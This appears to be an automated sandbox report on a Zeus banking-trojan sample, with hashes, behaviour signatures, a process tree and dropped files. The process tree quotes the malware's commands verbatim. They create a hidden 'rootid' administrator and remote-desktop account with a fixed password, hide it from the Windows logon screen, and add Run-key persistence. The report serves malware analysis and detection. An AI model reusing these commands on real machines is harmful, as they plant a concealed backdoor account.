Analysis
- max time kernel: 150s
- max time network: 124s
- platform: windows7_x64
- resource: win7
- submitted: 19-07-2020 16:48
- Static task: static1
- Behavioral task: behavioral1 (Sample: zeus 2_2.1.0.3.vir.exe, Resource: win7)
- Behavioral task: behavioral2 (Sample: zeus 2_2.1.0.3.vir.exe, Resource: win10v200430)
General
- Target: zeus 2_2.1.0.3.vir.exe
- Size: 199KB
- MD5: dc6b98b9707c0922ab6a53b3efdd5dac
- SHA1: a72e76fbd5dfa53b3d27ed9d9e6d194a085d7d0e
- SHA256: f55d6bd5f13356eda64fae070a5eee1a080f06a0aa69bdd7e137496d88346be3
- SHA512: 04b730c73876fc89eb465ebc069ad1e1bdbfbf5d1654a4bb49457d87ec290dd1832a571dea47adabea0d3f3c0461f8ce70d10fe2e4a82cbb698fed254c5d269b
Malware Config
Signatures
-
- Suspicious behavior: EnumeratesProcesses 33 IoCs
  Processes:
  pid    process
  792    ifob.exe    (listed 33 times)
- Suspicious use of SetWindowsHookEx 1 IoCs
  Processes:
  pid    process
  1544   WinMail.exe
- Executes dropped EXE 4 IoCs
  Processes:
  pid    process
  1028   new.exe
  2028   new.exe
  1272   ifob.exe
  792    ifob.exe
- Suspicious use of SetThreadContext 3 IoCs
  Processes:
  description                       pid    process    target process
  PID 1028 set thread context of 2028   1028   new.exe    new.exe
  PID 1272 set thread context of 792    1272   ifob.exe   ifob.exe
  PID 1068 set thread context of 1300   1068   cmd.exe    PING.EXE
- Suspicious use of AdjustPrivilegeToken 6 IoCs
  Processes:
  description                       pid    process
  Token: SeSecurityPrivilege        2028   new.exe
  Token: SeSecurityPrivilege        1612   zeus 2_2.1.0.3.vir.exe
  Token: SeSecurityPrivilege        1612   zeus 2_2.1.0.3.vir.exe
  Token: SeManageVolumePrivilege    1544   WinMail.exe
  Token: SeSecurityPrivilege        1068   cmd.exe
  Token: SeSecurityPrivilege        1068   cmd.exe
- Modifies WinLogon 2 TTPs 3 IoCs
  Processes:
  description        ioc                                                                                                          process
  Key created        \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList               reg.exe
  Key created        \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts                        reg.exe
  Set value (int)    \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\rootid = "0"  reg.exe
- Runs ping.exe 1 TTPs 7 IoCs
  Processes:
  pid    process
  1804   PING.EXE
  1416   PING.EXE
  1944   PING.EXE
  1156   PING.EXE
  664    PING.EXE
  1716   PING.EXE
  1300   PING.EXE
- Suspicious use of WriteProcessMemory 172 IoCs
  Processes: (64 of the 172 entries are listed; each pair below appears four times)
  description                      pid    process                   target process
  PID 1612 wrote to memory of 1068   1612   zeus 2_2.1.0.3.vir.exe    cmd.exe       (x4)
  PID 1612 wrote to memory of 1536   1612   zeus 2_2.1.0.3.vir.exe    cscript.exe   (x4)
  PID 1068 wrote to memory of 1804   1068   cmd.exe                   PING.EXE      (x4)
  PID 1068 wrote to memory of 1416   1068   cmd.exe                   PING.EXE      (x4)
  PID 1068 wrote to memory of 1944   1068   cmd.exe                   PING.EXE      (x4)
  PID 1612 wrote to memory of 1968   1612   zeus 2_2.1.0.3.vir.exe    net.exe       (x4)
  PID 1968 wrote to memory of 1300   1968   net.exe                   net1.exe      (x4)
  PID 1612 wrote to memory of 1836   1612   zeus 2_2.1.0.3.vir.exe    net.exe       (x4)
  PID 1836 wrote to memory of 1908   1836   net.exe                   net1.exe      (x4)
  PID 1612 wrote to memory of 2004   1612   zeus 2_2.1.0.3.vir.exe    net.exe       (x4)
  PID 2004 wrote to memory of 1584   2004   net.exe                   net1.exe      (x4)
  PID 1612 wrote to memory of 1656   1612   zeus 2_2.1.0.3.vir.exe    net.exe       (x4)
  PID 1656 wrote to memory of 1688   1656   net.exe                   net1.exe      (x4)
  PID 1612 wrote to memory of 1632   1612   zeus 2_2.1.0.3.vir.exe    reg.exe       (x4)
  PID 1612 wrote to memory of 1028   1612   zeus 2_2.1.0.3.vir.exe    new.exe       (x4)
  PID 1028 wrote to memory of 2028   1028   new.exe                   new.exe       (x4)
- Loads dropped DLL 5 IoCs
  Processes:
  pid    process
  1612   zeus 2_2.1.0.3.vir.exe
  1612   zeus 2_2.1.0.3.vir.exe
  1028   new.exe
  2028   new.exe
  2028   new.exe
- Runs net.exe
- Grants admin privileges 1 TTPs
  Uses net.exe to modify the user's privileges.
- Modifies Internet Explorer settings
  Processes:
  description        ioc                                                                                                                    process
  Key created        \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Privacy                      zeus 2_2.1.0.3.vir.exe
  Set value (int)    \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Privacy\CleanCookies = "0"   zeus 2_2.1.0.3.vir.exe
- NTFS ADS 1 IoCs
  Processes:
  description                      ioc                                                                                                     process
  File opened for modification     C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Inbox\541917F1-00000001.eml:OECustomProperty   WinMail.exe
- Adds Run key to start application 2 TTPs 3 IoCs
  Processes:
  description        ioc                                                                                                                                                 process
  Set value (str)    \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\disable_nasty_checks = "setx SEE_MASK_NOZONECHECKS 1"                                      zeus 2_2.1.0.3.vir.exe
  Key created        \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\Currentversion\Run                                                          ifob.exe
  Set value (str)    \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\{2A246F39-F0CA-97F1-81D9-8A67E94802A0} = "C:\\Users\\Admin\\AppData\\Roaming\\Dera\\ifob.exe"   ifob.exe
Processes
(process tree; indentation shows parent/child depth, "cmd:" is the recorded command line, bullets are the signatures hit by that process)

C:\Windows\system32\taskhost.exe
    cmd: "taskhost.exe"
C:\Windows\system32\Dwm.exe
    cmd: "C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
    cmd: C:\Windows\Explorer.EXE
    C:\Users\Admin\AppData\Local\Temp\zeus 2_2.1.0.3.vir.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\zeus 2_2.1.0.3.vir.exe"
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - Loads dropped DLL
        - Modifies Internet Explorer settings
        - Adds Run key to start application
        C:\Windows\SysWOW64\cmd.exe
            cmd: cmd /c ""C:\Users\Admin\AppData\Local\Temp\delme.bat" "
            - Suspicious use of SetThreadContext
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\PING.EXE
                cmd: ping localhost -n 3
                - Runs ping.exe
            C:\Windows\SysWOW64\PING.EXE
                cmd: ping localhost -n 3
                - Runs ping.exe
            C:\Windows\SysWOW64\PING.EXE
                cmd: ping localhost -n 3
                - Runs ping.exe
            C:\Windows\SysWOW64\PING.EXE
                cmd: ping localhost -n 3
                - Runs ping.exe
            C:\Windows\SysWOW64\PING.EXE
                cmd: ping localhost -n 3
                - Runs ping.exe
            C:\Windows\SysWOW64\PING.EXE
                cmd: ping localhost -n 3
                - Runs ping.exe
            C:\Windows\SysWOW64\PING.EXE
                cmd: ping localhost -n 3
                - Runs ping.exe
        C:\Windows\SysWOW64\cscript.exe
            cmd: cscript ldapdi.vbs
        C:\Windows\SysWOW64\net.exe
            cmd: C:\Windows\system32\net.exe user rootid Stormload0987 /add
            - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\net1.exe
                cmd: C:\Windows\system32\net1 user rootid Stormload0987 /add
        C:\Windows\SysWOW64\net.exe
            cmd: C:\Windows\system32\net.exe localgroup Administrators rootid /add
            - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\net1.exe
                cmd: C:\Windows\system32\net1 localgroup Administrators rootid /add
        C:\Windows\SysWOW64\net.exe
            cmd: C:\Windows\system32\net.exe localgroup "Remote Desktop Users" rootid /add
            - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\net1.exe
                cmd: C:\Windows\system32\net1 localgroup "Remote Desktop Users" rootid /add
        C:\Windows\SysWOW64\net.exe
            cmd: C:\Windows\system32\net.exe accounts /maxpwage:unlimited
            - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\net1.exe
                cmd: C:\Windows\system32\net1 accounts /maxpwage:unlimited
        C:\Windows\SysWOW64\reg.exe
            cmd: C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v rootid /t REG_DWORD /d "00000000" /f
            - Modifies WinLogon
        C:\Users\Admin\AppData\Local\Temp\new.exe
            cmd: new.exe
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious use of WriteProcessMemory
            - Loads dropped DLL
            C:\Users\Admin\AppData\Local\Temp\new.exe
                cmd: "C:\Users\Admin\AppData\Local\Temp\new.exe"
                - Executes dropped EXE
                - Suspicious use of AdjustPrivilegeToken
                - Loads dropped DLL
                C:\Users\Admin\AppData\Roaming\Dera\ifob.exe
                    cmd: "C:\Users\Admin\AppData\Roaming\Dera\ifob.exe"
                    - Executes dropped EXE
                    - Suspicious use of SetThreadContext
                    C:\Users\Admin\AppData\Roaming\Dera\ifob.exe
                        cmd: "C:\Users\Admin\AppData\Roaming\Dera\ifob.exe"
                        - Suspicious behavior: EnumeratesProcesses
                        - Executes dropped EXE
                        - Adds Run key to start application
                C:\Windows\SysWOW64\cmd.exe
                    cmd: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp75392daa.bat"
C:\Windows\system32\conhost.exe
    cmd: \??\C:\Windows\system32\conhost.exe "-1795011195-1625797998-142733676-1073621974243985992704183383-665834837-721666196"
C:\Windows\system32\conhost.exe
    cmd: \??\C:\Windows\system32\conhost.exe "-1885619546-1357878500-104955189414995788351548612191-6565673801931841097832449507"
C:\Program Files\Windows Mail\WinMail.exe
    cmd: "C:\Program Files\Windows Mail\WinMail.exe" -Embedding
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of AdjustPrivilegeToken
    - NTFS ADS
C:\Windows\system32\DllHost.exe
    cmd: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\DllHost.exe
    cmd: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\DllHost.exe
    cmd: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\DllHost.exe
    cmd: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\system32\DllHost.exe
    cmd: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
Files:
- C:\Users\Admin\AppData\Local\Temp\delme.bat
- C:\Users\Admin\AppData\Local\Temp\ldapdi.vbs
- C:\Users\Admin\AppData\Local\Temp\new.exe
- C:\Users\Admin\AppData\Local\Temp\new.exe
- C:\Users\Admin\AppData\Local\Temp\new.exe
- C:\Users\Admin\AppData\Local\Temp\tmp75392daa.bat
- C:\Users\Admin\AppData\Roaming\Dera\ifob.exe
- C:\Users\Admin\AppData\Roaming\Dera\ifob.exe
- C:\Users\Admin\AppData\Roaming\Dera\ifob.exe
- C:\Users\Admin\AppData\Roaming\Onfo\qoreo.gii
- C:\Users\Admin\AppData\Roaming\Onfo\qoreo.gii
- \??\PIPE\samr
- \Users\Admin\AppData\Local\Temp\new.exe
- \Users\Admin\AppData\Local\Temp\new.exe
- \Users\Admin\AppData\Local\Temp\new.exe
- \Users\Admin\AppData\Roaming\Dera\ifob.exe
- \Users\Admin\AppData\Roaming\Dera\ifob.exe
Memory dumps (filesize given where the report records one):
- memory/664-43-0x0000000000000000-mapping.dmp
- memory/792-35-0x000000000040D562-mapping.dmp
- memory/892-38-0x0000000000000000-mapping.dmp
- memory/1028-20-0x0000000000000000-mapping.dmp
- memory/1068-0-0x0000000000000000-mapping.dmp
- memory/1068-57-0x0000000000000000-mapping.dmp
- memory/1156-28-0x0000000000000000-mapping.dmp
- memory/1272-31-0x0000000000000000-mapping.dmp
- memory/1300-59-0x0000000000050000-0x0000000000077000-memory.dmp (Filesize 156KB)
- memory/1300-9-0x0000000000000000-mapping.dmp
- memory/1300-60-0x000000000005D1DF-mapping.dmp
- memory/1416-5-0x0000000000000000-mapping.dmp
- memory/1536-7-0x0000000002850000-0x0000000002854000-memory.dmp (Filesize 16KB)
- memory/1536-1-0x0000000000000000-mapping.dmp
- memory/1544-52-0x0000000003AF0000-0x0000000003AF2000-memory.dmp (Filesize 8KB)
- memory/1544-53-0x0000000003AE0000-0x0000000003AE2000-memory.dmp (Filesize 8KB)
- memory/1544-68-0x0000000003E70000-0x0000000003E72000-memory.dmp (Filesize 8KB)
- memory/1544-67-0x0000000003AD0000-0x0000000003AD2000-memory.dmp (Filesize 8KB)
- memory/1544-66-0x0000000003AD0000-0x0000000003AD2000-memory.dmp (Filesize 8KB)
- memory/1544-65-0x0000000003DD0000-0x0000000003DD2000-memory.dmp (Filesize 8KB)
- memory/1544-64-0x0000000003AD0000-0x0000000003AD2000-memory.dmp (Filesize 8KB)
- memory/1544-40-0x0000000003890000-0x0000000003990000-memory.dmp (Filesize 1024KB)
- memory/1544-42-0x0000000003890000-0x0000000003A90000-memory.dmp (Filesize 2.0MB)
- memory/1544-63-0x0000000003BC0000-0x0000000003BC2000-memory.dmp (Filesize 8KB)
- memory/1544-45-0x0000000003890000-0x0000000003990000-memory.dmp (Filesize 1024KB)
- memory/1544-46-0x0000000003890000-0x0000000003A90000-memory.dmp (Filesize 2.0MB)
- memory/1544-47-0x0000000003990000-0x0000000003A90000-memory.dmp (Filesize 1024KB)
- memory/1544-51-0x0000000003AD0000-0x0000000003AD2000-memory.dmp (Filesize 8KB)
- memory/1544-62-0x0000000003AD0000-0x0000000003AD2000-memory.dmp (Filesize 8KB)
- memory/1544-61-0x0000000003E40000-0x0000000003E42000-memory.dmp (Filesize 8KB)
- memory/1544-54-0x0000000003AD0000-0x0000000003AD2000-memory.dmp (Filesize 8KB)
- memory/1544-55-0x0000000003E60000-0x0000000003E62000-memory.dmp (Filesize 8KB)
- memory/1584-13-0x0000000000000000-mapping.dmp
- memory/1632-17-0x0000000000000000-mapping.dmp
- memory/1656-15-0x0000000000000000-mapping.dmp
- memory/1688-16-0x0000000000000000-mapping.dmp
- memory/1716-56-0x0000000000000000-mapping.dmp
- memory/1804-4-0x0000000000000000-mapping.dmp
- memory/1836-10-0x0000000000000000-mapping.dmp
- memory/1908-11-0x0000000000000000-mapping.dmp
- memory/1944-6-0x0000000000000000-mapping.dmp
- memory/1968-8-0x0000000000000000-mapping.dmp
- memory/2004-12-0x0000000000000000-mapping.dmp
- memory/2028-24-0x0000000000400000-0x0000000000427000-memory.dmp (Filesize 156KB)
- memory/2028-25-0x000000000040D562-mapping.dmp
- memory/2028-27-0x0000000000400000-0x0000000000427000-memory.dmp (Filesize 156KB)